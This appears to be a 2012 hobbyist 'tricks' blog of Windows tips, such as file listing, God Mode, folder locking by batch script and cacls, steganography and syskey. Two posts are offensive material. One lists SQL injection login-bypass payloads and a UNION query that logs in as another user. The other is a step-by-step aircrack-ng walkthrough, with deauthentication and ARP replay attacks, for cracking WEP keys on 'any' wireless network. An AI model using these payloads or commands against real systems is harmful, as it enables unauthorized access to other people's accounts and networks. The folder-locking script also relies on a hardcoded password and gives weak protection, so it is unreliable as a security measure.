Search This Blog

Friday 28 December 2012

SEARCH QUICKLY INTO YOUR SYSTEM.

This trick will save the all sub directory and file names in text file without browsing the drive or folder.

First of all open command Prompt
Go to start> run> cmd
Browse the folder or drive which you want to analyze the sub directories and files.
In command prompt,
Type D: and then cd hack 

For Ex: If you want navigate to D:\hack 

1. If you want to scan all the sub directories and files which are present inside these sub directories then type the following command
dir *.* /s /b > list.txt

2. If you want to search only microsoft word files then use this command
dir *.doc /s /b > list.txt

3. If you want to see only pdf files then use this command
dir *.pdf /s /b > list.txt

4. If you want search a file with particular name say address.doc
dir address.* /s /b > list.txt
or
dir address.doc /s /b > list.txt

.............................................................................................................

Tuesday 20 November 2012

GOD MODE IN WINDOWS 7.

To Enable 'God Mode' in Windows 7
This trick is running on OS Windows 7, To enter the "GodMode" we need to create a new folder.
Then rename the folder to:

GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}

The folder icon will change to Control Panel icon and will contain hundreds of Control options Access
............................................................................................................

Friday 14 September 2012

ACCESS UR FOLDER AS A DRIVE.

Just follow the steps as given below :-

Go to start> run> cmd
In command prompt,
Type:  subst Z: D:\folder 
and hit Enter...
You can replace Z: with your desired New Drive Letter (Except existing Drive letters)
You can replace D:\folder with the path of your favorite folder
Now, Type: exit

This will creates a new drive... When you open this , it will open your folder.

NOTE: On Restart the Virtual Drive Disappears .
............................................................................................................

Monday 27 August 2012

CREATING OWN RUN COMMAND IN WINDOWS.

Just follow the steps as given below :-

Step 1: Create the shortcut for the folder or tool for which you need to create the shortcut.
Right-click on your Desktop and select New -> Shortcut.
You will see a “Create Shortcut” Dialog box
Type notepad.exe then press next.
Then type any name for the shortcut.

Step 2: Open the run command and goto \Windows

Step 3: Paste the shortcut to that folder and change the name of the shortcut to run command as we want.

Now we can open the folder or tool from run command using the name we have given for the shortcut.
.....................................................................................................

Tuesday 21 August 2012

SECURE FOLDER BY MAKING INACCESSIBLE AND UNDELETABLE.

Want to lock a folder without using any software / password in Windows,
Just follow the steps as given below :- 
Go to start> run> cmd
In command prompt,

Type:    cacls "path_of_folder" /E /P everyone:n
To regain access

Type:    cacls "path_of_folder" /E /P everyone:f

Note: Do not lock C:\ drive using this trick otherwise Windows will not boot next time.

........................................................................................................

Wednesday 1 August 2012

GOOGLE TRICKS.

List of some google operators....

1. Google trick to search different file formats (keyword filetype:doc)

2. Google trick to search educational resources (keyword site:.edu) example (computer site:.edu)

3. Finding the time of any location (time romania)

4. Finding the weather of any location (boston weather)

5. Finding faces (add imgtype=face to the URL)

6. Using Google as a calculator (9 * 10)(143+234)(119-8)

7. Converting currencies (1 USD in INR)(10 US Dollars in Indian Rupee)

8. Find how many teaspoons are in a quarter cup (quarter cup in teaspoons)

9. How many seconds there are in a year (seconds in a year)

10. Tracking stocks (stocks:MSFT)
..........................................................................................................

HIDE THE DATA IN A NOTEPAD.

Here is a very interesting trick to hide text inside your windows default text editor i.e. Notepad using command prompt, but this trick works only on NTFS file system.

Steps:
1. Go to your command prompt Start–>Run and Type cmd
2. Type cd.. to move to C:\> drive or Type cd desktop to move to your desktop.
3. Type the below code in your command prompt
notepad file.txt: hidden
4. Write some data and save (Ctrl+s) the file.
5. Browse to the file location and Open file.txt you cannot see any data in the file.
6. To retrieve the hidden data open command prompt and type the same command.
Notepad file.txt:hidden
............................................................................................................

Saturday 14 July 2012

LOCK A FOLDER WITHOUT ANY SOFTWARE

LOCK A FOLDER WITHOUT ANY SOFTWARE:
STEPS:

1. Open notepad and paste the following code in it.
2. Change the password in place of (qwerty)
3. Save the notepad as: Locker.bat
4. At first time start it will create folder with Locker automatically for u.
5. After creation of Locker folder again click on the Locker.bat
6. It will ask.press Y then Locker folder will be disappeared.
7. Again to get it click on locker.bat. and give ur password u will get the folder again.

note: current password is qwerty

CODE:

cls
@color A
@echo off
if EXIST "Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}" goto

unlock
if NOT EXIST locker goto mdfolder

:confirm
echo Are you sure want to lock the locker(Y/N)
set/p "ch="
if %ch%==y goto lock
if %ch%==Y goto lock
if %ch%==n goto end
if %ch%==N goto end
echo invalid choice
goto confirm

:lock
ren locker "Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}"
attrib +s +h "Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}"
echo lock successfully
goto end

:unlock
echo Enter password for unlock
set/p "pass="
if NOT %pass%==qwerty goto fail
attrib -s -h "Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}"
ren "Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}" locker
echo Unlock successfully
goto end

:fail
echo Invalid Password
goto end

:mdfolder
md locker
echo Locker created successfully
goto end

:end
echo Locker generated by xtreme hackers
echo www.xtremehackers.blogspot.com
pause:

.....................................................................................................

Friday 13 July 2012

SQL INJECTION

SQL injection is a code injection technique that exploits a security vulnerability occurring in the database
layer of an application. The vulnerability is present when user input is either incorrectly filtered for
string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby
unexpectedly executed. It is in fact an instance of a more general class of vulnerabilities that can occur
whenever one programming or scripting language is embedded inside another.

SELECT * FROM users WHERE name = ‘a’ OR ‘t’='t’;

x’;UPDATE members SET email = ‘steve@unixwiz.net’ WHERE email = ‘bob@example.com

Bypassing Login Screens (SMO+)
SQL Injection 101, Login tricks

* admin’ –
* admin’ #
* admin’/*
* ‘ or 1=1–
* ‘ or 1=1#
* ‘ or 1=1/*
* ‘) or ’1′=’1–
* ‘) or (’1′=’1–
* ….

* Login as different user (SM*)
‘ UNION SELECT 1, ‘anotheruser’, ‘doesnt matter’, 1–

*Old versions of MySQL doesn’t support union queries

............................................................................................................

CRACK WIFI

Here is the detailed method for hacking a Wi-fi network......

Run the commands enlisted below in console mode of Linux Backtrack 4. (search in Google.. and u'll get the live CD for Backtrack 4 )

I tried to be as clear as possible.. at every command.. I tried to give brief explanation of the command itself.

You can try these steps to crack any Wireless network. It's strictly for Educational purpose.

------------------------------?-----------------------------
Finding the list of available Interfaces:
Iwconfig
------------------------------?----------------------------
Bring the card in monitor mode:
iwconfig mode monitor "Enable Monitor Mode"
OR
Bring the card in monitor mode using:
airmon-ng start
------------------------------?----------------------------
Scan for Access points and associated clients:
airodump-ng "GET BSSID, Channel, Station ID" first session
------------------------------?----------------------------
Capture packets to file:
airodump-ng --write --channel -b
------------------------------?----------------------------
Injection test:- check whether the card support injection or not:
aireplay-ng -9
------------------------------?----------------------------
Arp replay Attack:
aireplay-ng -3 -x 512 -b -h "ARP Attack"
------------------------------?----------------------------
Fake Association attack:
aireplay-ng -1 16 -a -c
------------------------------?----------------------------
Deauthentication Attack :
aireplay-ng -0 4 -a -h "Deauth Attack"
------------------------------?----------------------------
Crack WEP Key:
aircrack-ng -a 1 -b *.cap
------------------------------?--------------------------

You would require two essentials for cracking the wireless network:
1. Backtrack 4 Live CD
2. Wireless Network card

PLz dont try to hack any network with ur Laptop Wi-fi.. coz it sends huge number of packets to the network.. approx 35,000 packets ( to the network which we suppose to hack ). But if you wish to never use ur Laptop Wi-fi.. then it may actually a good solution for you.

....................................................................................................

Wednesday 20 June 2012

KEYBOARD TRICKS IN WINDOWS 7

[Windows] + [D]
Show or Hide the desktop

[Windows] + [Home]
Minimize all but selected window. Reverse by clicking the key combination again.

[Windows] + [Spacebar]
Make all open windows transparent to view gadgets and icons on desktop.

[Windows] + left arrow OR [Windows] + right arrow
Dock selected window to the left or right half of your screen.

[Windows] + up arrow OR [Windows] + down arrow
Maximized and restores the selected window.

[Windows] + [Tab]
Launch 3D representation of open windows and click [Tab] key again to flip through them.

[Windows] + [B]
Puts focus on the ‘show hidden icons’ button on the system tray.

[Windows] + [1] To [Windows] + [9]
Launch first through ninth icon on taskbar, including items pinned to taskbar.

[Windows] + [SHIFT] + [1] To [Windows] + [SHIFT] + [9]
Starts new instance of respective taskbar icon.

[Windows] + [Alt] + [1] To [Windows] + [Alt] + [9]
Opens jump list for respective icon.

[Windows] + [T] OR [Windows] + [SHIFT] + [T]
Move focus to front or back of taskbar.

[Alt] + [Ctrl] + [Tab] + left/right/up/down arrow
Flip window.

[Alt] + [Tab]
Cycle through open windows.

[Windows] + [P]
Select the Projector Mode

[Windows] + [+] OR [Windows] + [-]
Activates Windows Magnifier to zoom in or out of screen.

[Ctrl] + [Alt] + [D]
Switch to docked mode.

Ctrl] + [Alt] + [L]
Switch to lense mode.

[Ctrl] + [Alt] + [F]
Switch from docked or lens mode back to full screen mode.

[Ctrl] + [Alt] + [I]
Invert colors.

[Windows] + [Esc]
Exist magnifier views.

[Windows] + [G]
Cycle through desktop gadgets.

[Windows] + [X]
Launches Windows Mobility Center. Especially useful if you’re working on a laptop.
........................................................................................

Wednesday 22 February 2012

LOCK/UNLOCK COMPUTER WITH PENDRIVE

Just follow the steps as given below :- 
Insert your USB drive into your system and wait for it to be recognized..

STEP1:-Go to Start >
Control Panel >
Administrative Tools >
Computer Management >
Disk Management >
Or
You can go directly by typing the command in run: diskmgmt.msc
 Then right-click the partition whose name you want to change (click in the white area just below the word “Volume”) and select “change drive letter and paths.”
From here you can re-assign the drive letter it was given to “A”
NOTE:Drive letter of pendrive must be "A"

STEP2:- Start->Run->syskey
click on "ok"
Syskey launched: Click “Update”

Choose “Store Startup key on floppy disk” and click “OK”
You’ll be prompted to enter your diskette. Make sure your USB drive is inserted and writable.
Restart and have fun. Don’t lose your USB disk! Also, to revert this, you can run syskey again and choose to store it locally instead of “on a floppy disk”.

....................................................................................................


Thursday 9 February 2012

OPEN CMD WITH RIGHT CLICK.

Just hold down the Shift key and right-click on the desktop…
And then you can choose “Open Command Window Here” from the menu. The great thing about this is that the current path is the desktop, which is convenient for manipulating files on the desktop.
Of course you can always right-click on any folder icon in the system while holding down the shift key:
...................................................................................................

HOW TO CHANGE DRIVE LETTER.

To change drive letters ...
Just follow the steps as given below :- 
Go to Start >
Control Panel >
Administrative Tools >
Computer Management >
Disk Management >
Or
You can go directly by typing the command in run: diskmgmt.msc
Then right-click the partition whose name you want to change (click in the white area just below the word “Volume”) and select “change drive letter and paths.” From here you can add, remove or change drive letters and paths to the partition.
.....................................................................................................

HOW TO HIDE TEXT BEHIND IMAGE(STEGANOGRAPHY)

What is Steganography?
Steganography is the technique of hiding confidential information within any media.

Just follow the steps as given below :- 
First copy any Image to your C: directory
Open cmd by going Start-Run program- type cmd (Administrative mode)
Type command cd\ in cmd press enter.
Now write command as:
echo “your text to hide” >> image.jpg
change 'you text to hide' to your message and also name of the image.
 Now go to your image and open it with Notepad and you will your hidden message at the end of the image file contents.
...............................................................................................

Thursday 26 January 2012

HOW TO CHANGE FOLDER BACKGROUND

TRICK TO CHANGE FOLDER BACKGROUND

1. Open Command Prompt and set folder attribute to "system". Suppose there is a folder "Sunny" in "E:\" drive, in which you want to set a wallpaper as background image.
TYPE.:  attrib +s E:\Sunny


2. Now open Notepad and paste following code:

[ExtShellFolderViews]
{BE098140-A513-11D0-A3A4-00C04FD706EC} = {BE098140-A513-11D0-A3A4-00C04FD706EC}
[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
Attributes=1
IconArea_Image=D:\Wallpaper\Image1.jpg
IconArea_Text=0x00000000

Now change "path_of_the_wallpaper" to the exact path of the wallpaper which you want to set as background. Suppose the wallpaper is stored in "D:\Wallpaper\Image1.jpg".

3. Now save the file with name "Desktop.ini" (including quotes) and copy the file in the desired folder which is "Sunny" in our example.
4. Thats it. Close the folder and re-open it. Now it should show the wallpaper as background.

IconArea_Text
Black - 0x00000000
White - 0x00FFFFFF
Green - 0x0000FF00
Blue - 0x00FF0000
Purple - 0x00C000C0
Red - 0x000000FF
Yellow - 0x0000FFFF
Indigo - 0x00FFFF00
NOTE: This trick works only in windows xp.
.........................................................................................................

HOW TO MAKE AN UNDELETABLE FOLDER

1. Open cmd ( Type in Run option, the command 'cmd' or navigate to All Programs->Accessories-> Command Prompt)


2. In cmd,change the directory that you want. for example to change from your current drive to D drive (Type D:)

3. Type md \lpt1\\ and press enter, the folder now will be in your D:

4. If you try to delete or rename it, it will appear error message

5. If you want to delete it just go to 'cmd', navigate to the directory and type rd \lpt1\\ and press Enter.
............................................................................................................

Wednesday 25 January 2012

SECURE YOUR WINDOWS WITH SYSKEY

SECURE YOUR WINDOWS WITH SYSKEY

Microsoft uses a file called sam to store the sam data on windows NT
SAM(SECURITY ACCOUNT MANAGER)-It stores the hases of password.
Protect your sam file use syskey.
To enable syskey in windows go to run
Type syskey
sam lock tool will open



click on update
a dialog box will open named startup key
click on radio button password startup
enter password and click ok.
now next time u start your computer it will ask for password.
.................................................................................